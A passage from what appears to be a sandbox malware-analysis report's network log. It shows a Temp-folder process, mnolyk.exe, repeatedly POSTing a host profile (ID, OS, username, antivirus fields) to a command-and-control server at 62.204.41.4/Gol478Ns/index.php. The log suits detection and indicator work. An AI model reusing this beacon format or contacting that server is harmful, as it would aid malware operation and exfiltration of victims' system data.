                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:17.347282887 CET180INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      650192.168.2.75034562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:55.938391924 CET765OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:56.002156019 CET765INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      651192.168.2.75034662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:56.168423891 CET766OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:56.234231949 CET766INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      652192.168.2.75034762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:56.442075968 CET767OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:56.517404079 CET767INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      653192.168.2.75034862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:56.686064959 CET768OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:56.750740051 CET768INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      654192.168.2.75034962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:56.920228004 CET769OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:56.984253883 CET769INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      655192.168.2.75035062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:57.159010887 CET770OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:57.224802971 CET770INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      656192.168.2.75035162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:57.406627893 CET771OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:57.469439030 CET771INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      657192.168.2.75035262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:57.641139030 CET772OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:57.704109907 CET772INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      658192.168.2.75035362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:57.891552925 CET773OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:57.953656912 CET773INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      659192.168.2.75035462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:58.136933088 CET774OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:58.203717947 CET774INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      66192.168.2.74976162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:17.550184011 CET181OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:17.615426064 CET181INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      660192.168.2.75035562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:58.376240015 CET775OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:58.441500902 CET775INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      661192.168.2.75035662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:58.629045010 CET776OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:58.693655014 CET776INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      662192.168.2.75035762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:58.872293949 CET777OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:58.936474085 CET777INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      663192.168.2.75035862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:59.107326031 CET778OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:59.172822952 CET778INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      664192.168.2.75035962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:59.354060888 CET779OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:59.417911053 CET779INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      665192.168.2.75036062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:59.589637995 CET780OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:59.652297020 CET780INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      666192.168.2.75036162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:59.837622881 CET781OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:59.900100946 CET781INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      667192.168.2.75036262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:00.086375952 CET782OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:00.150013924 CET782INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
